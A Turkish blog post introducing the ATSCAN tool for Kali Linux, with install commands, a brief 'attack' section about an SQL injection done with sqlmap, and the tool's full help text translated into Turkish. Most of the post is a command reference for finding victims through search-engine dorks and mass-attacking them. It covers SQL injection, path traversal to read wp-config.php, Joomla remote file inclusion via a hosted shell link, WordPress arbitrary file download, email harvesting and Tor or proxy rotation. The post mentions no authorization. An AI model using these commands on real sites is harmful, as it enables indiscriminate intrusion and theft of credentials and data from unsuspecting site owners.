Kali Linux ATSCAN nedir, nasıl kullanılır ?

Öncelikle Kali Linux ATSCAN Nedir ?

ATSCAN, kısaca dork aramaya, hedef site üzerinde ki script buglarını bulmaya, server üzerinde belirli tespit ve analiz yapmaya, encode ve decode gibi bir çok işlevleri olan çok özellikli bir tooldur. Kali Linux’u indirmek için buraya tıklaya bilirsiniz.

KURULUM

Kurulum konusundan bahsedecek olursak; ATSCANTR olarak kullanılabilmekte ancak ben bu tür toolların ingilizce kullanılmasını tavsiye ederim. Videoda da ingilizce olarak ele aldım. Videoda kurulum esnasında terminale şunları yazarak kurulumu gerçekleştiriyoruz sırası ile ;

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x ./atscan.pl
chmod +x ./install.sh
./install.sh

KULLANIM

Kurulum aşamasını geçtikten sonra Kullanımından bahsedecek olursak. Oldukça kullanışlı olduğunu sizde “atscan –h “ yazarak görebilirsiniz. Şimdi temel olarak sistemi açıklarını aktif olarak belirli bir seviye dizgisinde taramaya yarıyor. Server, İP ve Firewall Bilgilerini bu program aracılığı ile yapabiliyoruz. Aşağıda paylaştığım videoda basit ve orta derecede kullanımından bahsettim nasıl kullanıldığı ile alakalı olarak aklınızda bir pratik olması açısından. Videonun altında help fonksiyonu altındaki tüm içeriği türkçe olarak paylaşacağım.

Ayrıca Videoda Bahsetmeyi unuttuğum bir şey daha var. Terminalde “atscan –interactive” yazarsanız ve “options” yazarsanız “normal” ve “advenced” seviyede tarama modlarını görebilirsiniz. Burada değerler default olarak “0” değerindedir. Belirli bir seviyede devam etmek isterseniz. Oldukça işlemleriniz kolaylaşabilir. İlgili ekran görüntüsü :

SALDIRI

Saldırı aşamasında örnek basit bi sqlmap aracı ile sql injection gerçekleştirdik. Videonun uzamaması için. Bunun haricinde XSS saldırıları ve verilen İp bilgileri ile nmap soruları gerçekleştirilebilir. Server bilgisinden saldırılar gerçekleştirilebilinir. Bunlar tamamen Kullanıcının bilgisine bağlı olarak değişiklik gösterecektir.

https://www.youtube.com/watch?v=Np04Tju4c8U

Aşağıya komut arşivini de bırakayım.

–proxy       | Taramalar icin proxy’yi ayarla [EX: –proxy “socks://localhost:9050”]
| proxy ayarla [EX: –proxy “http://12.45.44.2:8080”]
| proxy listesi ayarla [EX: –proxy list.txt]
-m             | Arama motorlarini varsayilan bing EX olarak ayarlayin: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
–proxy-random | Rastgele proxy [EX: –proxy-random list.txt] or –proxy-random “socks://localhost:9050”]
–m-random     | Tum disponibles motorlarinin rastgele
–brandom      | Tum disponibles ajanlari rastgele
–timeout      | Tarayici zaman asimini ayarla (saniye olarak)
–freq        | Rasgele zaman frekansi (saniye olarak)
–dork | -d    | Aranacak dork [Or: house [OTHER] cars [OTHER] otel]
-t             | Hedef
–level | -l   | Tarama duzeyi (+ – Taranacak sayfa sonuclari sayisi)
-p             | EX test parametresini ayarlayin:id,cat,product_ID
–save | -s    | Cikti dosyasi.
–source       | Html cikti klasoru.
–content      | Yanit icerigini yazdir.
–data        | veri. Orneklere bak
–post        | Posta yontemini kullan
–get          | Alma yontemini kullan
–header       | Basliklari ayarla.
–host        | Alan adi [Ex: site.com]
–nobanner     | Arac seridini gizle
–beep        | Pozitif tarama bulunursa uyari sesi cikar.
–ifend        | Tarama islemi bittiginde bip sesi cikar.
–noinfo       | Ekstra sonuc bilgisi atla.
–limit        | Tarama, tanimlanan miktarda pozitif sonuclara ulastiginda duraklatin
–valid | -v   | Dize olarak dogrulama
–status       | Http ustbilgi durumuna gore dogrulama
–ifinurl      | Tam dizeyle eslesen hedefleri alin
–sregex       | Tam esleme ile eslesen hedefleri alin
–unique       | Tam dork eslesen hedefleri alin
–replace      | Degistirilecek dize
–with        | Ile degistirilecek dizge
–full        | –replace –full Dizeden tum url parametrelerini sonuna kadar degistirecek
–payload      | Arac yukleri yerine kendi yuklerini kullan
–exp          | Exploit/Payload
–sql          | Xss tarama
–lfi          | Yerel dosya dahil etme
–joomrfi      | Joomla yerel dosya icerigini tara.
–shell        | Shell link [Ex: http://www.site.com/shell.txt]
–wpafd        | Keyfi dosya indirmek icin wordpress sitelerini tara
–admin        | Site yonetici sayfasi alin
–shost        | Site alt alanlari bulun
–tcp          | TCP port
–udp          | UDP port
–sites        | Sunucudaki siteler
–wp           | Sunucudaki WordPress siteleri
–joom        | Sunucudaki joomla siteleri
–upload       | Sunucuda yukleme dosyalari olan siteleri alin
–zip          | Sunucuda zip dosyalari bulunan siteleri alma
–md5          | Md5’e donusturun
–encode64     | Base64 dizesini kodla
–decode64     | Base64 dizgesini cozer
–TARGET       | Harici komutla hedef tarafindan degistirilecek
–HOST        | Harici komutla ana bilgisayarla degistirilecek
–HOSTIP       | Degistirilecek extern komutunda ana bilgisayar IP
–PORT        | Harici komutla acik port degistirilecek
–ip           | Ips almak icin tarama yapin
–regex        | Regex ile eslesen dizeleri almak icin tarama yapin
–noquery      | Dize degerini Query URL’sinden kaldir [ex: site.com/index.php?id=string]
–command      | Calistirmak icin Extern Komutanligi
–email        | E-postalar alin
rang(x-y)      | Ornek: –exp “/index.php?id=rang(1-9)” –sql OR -t “site.com/index.php?id=rang(1-9)” –sql
| site.com/index.php?id=1->9
repeat(txt-y) | Ornek: –exp “/index.php?id=repeat(../-9)wp-config.php” –sql OR -t “site.com/index.php?id=../wp-config.php”
| In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
[DATA/DATAFILE]| To separate data values ex: –data “name:username [DATA]email:xxxxxx [DATA]pass:xxxxx”
| Wordlist: –data “name:username [DATA]email:xxxx@xx.com [DATAFILE]pass:/root/Desktop/list.txt”
[OTHER]        | Diger tum degerleri ayri tutmak icin (dork exploit payload proxy target..) ornek: –dork “dork1 [OTHER]DORK2 [OTHER]DORK3”
–pass        | Arac parolasini ayarlayin veya duzenleyin
–config       | Yapilandirmayi ayarla.
–update       | Araci guncelle.
–uninstall    | Araci kaldir

———————————————————————————-
[::] Ornekler:
———————————————————————————-
PROXY:
Tor: –proxy socks://localhost:9050
Proxy: –proxy <proxy> [Ex: http://12.32.1.5:8080] | –proxy <list.txt>.

———————————————————————————-
SET HEADERS:
–header “Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1”

———————————————————————————-
RASTGELE
Rastgele proxy: –proxy-random [proxy | list.txt]
Rastgele ajan: –b-random
Rasgele motor: –m-random

———————————————————————————-
ARAMA MOTORU:
Arama: atscan –dork <dork> –level <level>
Arama: atscan -d <dork> -l <level>
Motor ayarla: atscan –dork <dork> –level <level> -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
Secici motorlari ayarla: atscan -d <dork> -l <level> -m 1,2,3..
Bircok dork ile arama yapin: atscan –dork <dork1 [OTHER]dork2 [OTHER]dork3> –level <level>
Arama ve rand: atscan -d <dork> -l <level> –exp “/index.php?id=rang(1-9)” –sql
Sunucu sitelerini edinin: atscan -t <ip> –level <value> –sites
Sunucu wordpress sitelerini edinin: atscan -t <ip> –level <value> –wp
Sunucu joomla sitelerini edinin: atscan -t <ipbgn-ipend> –level <value> –joom
Sunucu yukleme sitelerini edinin: atscan -t <ip> –level <value> –upload
Server zip sitelerini alin: atscan -t <ip> –level <value> –zip
WP Arbitry Dosya indirme: atscan -t <ip> –level <value> –wpafd
Joomla RFI: atscan -t <ip> –level <10> –joomfri –shell <shell link>
Arama + cikis: atscan –dork <dorks.txt> –level <level> –save

Arama + e-postalari alin: atscan -d <dorks.txt> -l <level> –email
Arama + site e-postalari alin: atscan –dork <site:site.com> –level <level> –email
E-postalari belirt: atscan -d <dorks.txt> -l <level> –email -v “@gmail | @yahoo ..”
Arama + ips almak: atscan –dork <dork> –level <level> –ip

———————————————————————————-
DUZENLI IFADELER:
Regex kullanimi: atscan [–dork <dork> | -t <target>] –level <level> –regex <regex>
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
E-mails: ((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\\-+)|([A-Za-z0-9]+\\.+)|([A-Za-z0-9]+\\++))*[A-Za-z0-9]+@((\\w+\\-+)|(\\w+\\.))*\\w{1,63}\\.[a-zA-Z]{2,6})

———————————————————————————-
REPEATER:
atscan -t “site.com?index.php?id=rang(1-10)” –sql
atscan -t <target> –exp “/index.php?id=rang(1-10)” –sql
atscan -t <target> –exp “/index.php?id=repeat(../-9)wp-config.php”

———————————————————————————-
PORTS:
atscan -t <ip> –port <port> [–udp | –tcp]
atscan -t (ip start)-(ip end) –port <port> [–udp | –tcp]
atscan -t <ip> –port (port start)-(port end) [–udp | –tcp] –command “Harici komutlar”

———————————————————————————-
ENCODE / DECODE:
Generate MD5: –md5 <string>
Encode base64: –encode64 <string>
Decode base64: –decode64 <string>

———————————————————————————-
POST/GET DATA:
Post data: atscan -t <target> –data “field1:value1[DATA]field2:value2[DATA]field3:value3” –post | –get
atscan -t <target> –data “username:john[DATA]pass:1234 –post | –get
Wordlist: atscan -t <target> –data “name:username [DATA]email:xxxx@xx [DATAFILE]pass:/root/Desktop/list.txt”
Post + Validation: –data “name:userfile[DATAFILE]value:file.txt” -v <string> | –status <code> –post | –get

———————————————————————————-
HARICI KOMUTLAR:
atscan –dork <dork | dorks.txt> –level <level> –command “curl -v –TARGET”
atscan –dork <dork | dorks.txt> –level <level> –command “curl -v –HOST”
atscan –dork <dork | dorks.txt> –level <level> –command “nmap -sV -p 21,22,80 –HOSTIP”
atscan -t <target> –port 80 –udp –command “nmap -sV -p –PORT –TARGET”
atscan -d “index of /lib/scripts/dl-skin.php” -l 20 -m 2 –command “php WP-dl-skin.php-exploit.php –TARGET”

———————————————————————————-
COKLU TARAMA:
atscan –dork <dork> –level <10> –sql –lfi –wp ..
atscan –dork <dork> –level <10> –replace <string> –with <string> –exp <exploit> [–sql | –lfi | –wp |…]
atscan -t <ip> –level <10> [–sql | –lfi | –wp |…]
atscan -t <targets> [–sql | –lfi | –wp |…]

———————————————————————————-
PAYLOAD’LARIN KULLANIMI:
atscan –dork <dork> –level <10> [–lfi | –sql ..] –payload <payload | payloads.txt>

———————————————————————————-
ARAMA VALIDASYONU:
atscan -d <dork | dorks.txt> -l <level> –status <code> | –valid <string>
atscan -d <dork | dorks.txt> -l <level> –ifinurl <string>
atscan -d <dork | dorks.txt> -l <level> –regex <regex> –valid <string>
atscan -d <dork | dorks.txt> -l <level> –unique

———————————————————————————-
TARAMA TEYITATI:
atscan -t <target | targets.txt> [–status <code> | –valid <string>]
atscan -d <dork | dorks.txt> -l <level> –exp <payload> –status <code> | –valid <string>
atscan -d <dorks.txt> -l <level> –replace <string> –with <string> –status <code> | –valid <string>
atscan -d <dork | dorks.txt> -l <level> [–admin | –sql ..] –status <code> | –valid <string>
atscan -d <dorks.txt> -l <level> –replace <string> –with <string> –status <code> | –valid <string>
atscan -d <dorks.txt> -l <level> –replace <string> –with <string> –full –status <code> | –valid <string>
atscan -d <dorks.txt> -l <level> –replace <string> –with <string> –exp <payload> –status <code> | –valid <string>
atscan –data “name:userfile[DATAFILE]value:file.txt” –post -v <string> | –status <code>
atscan -d <dork | dorks.txt> -l <level> [–sql | –shost ..] –status <code> | –valid <string&g

Yorum Yap

E-posta hesabınız yayımlanmayacak. Doldurulması zorunlu alanlar işaretlendi *